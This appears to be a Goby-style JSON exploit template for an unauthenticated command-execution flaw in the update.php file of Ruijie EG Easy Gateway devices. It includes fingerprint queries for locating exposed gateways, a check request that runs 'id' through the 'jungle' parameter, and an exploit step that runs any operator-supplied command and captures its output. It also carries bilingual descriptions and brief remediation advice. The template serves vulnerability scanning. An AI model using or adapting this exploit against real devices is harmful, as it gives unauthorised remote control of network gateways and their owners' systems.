{ "Name": "Ruijie EG update.php RCE", "Description": "

Ruijie EG Gateway is an efficient wireless gateway device.

There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.

", "Product": "Ruijie EWEB", "Homepage": "https://www.ruijie.com.cn/", "DisclosureDate": "2022-03-23", "Author": "abszse", "FofaQuery": "body=\"EG易网关\"", "GobyQuery": "body=\"EG易网关\"", "Level": "3", "Impact": "

There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.

", "Recommendation": "

Authenticate the update.php file interface

Set up a whitelist to prevent malicious users

Pay attention to the official website update: https://www.ruijie.com.cn/

", "References": [ "https://fofa.so/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "ls", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/update.php?jungle=id", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "gid=", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "uid=", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/update.php?jungle={{{cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Command Execution" ], "VulType": [ "Command Execution" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "10", "Translation": { "CN": { "Name": "锐捷 EG 易网关 update.php 文件命令执行漏洞", "Product": "锐捷EG易网关", "Description": "

锐捷EG易网关是一款高效的无线网关设备。

锐捷EG易网关 update.php 文件存在安全漏洞,未授权用户可执行任意命令。

", "Recommendation": "

对 update.php文件接口鉴权处理

设置白名单防止恶意用户

关注官网更新:https://www.ruijie.com.cn/

", "Impact": "

锐捷EG易网关 update.php 文件存在安全漏洞,未授权用户可执行任意命令。

", "VulType": [ "命令执⾏" ], "Tags": [ "命令执⾏" ] }, "EN": { "Name": "Ruijie EG update.php RCE", "Product": "Ruijie EWEB", "Description": "

Ruijie EG Gateway is an efficient wireless gateway device.

There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.

", "Recommendation": "

Authenticate the update.php file interface

Set up a whitelist to prevent malicious users

Pay attention to the official website update: https://www.ruijie.com.cn/

", "Impact": "

There is a security vulnerability in the update.php file of Ruijie EG Easy Gateway, and unauthorized users can execute arbitrary commands.

", "VulType": [ "Command Execution" ], "Tags": [ "Command Execution" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }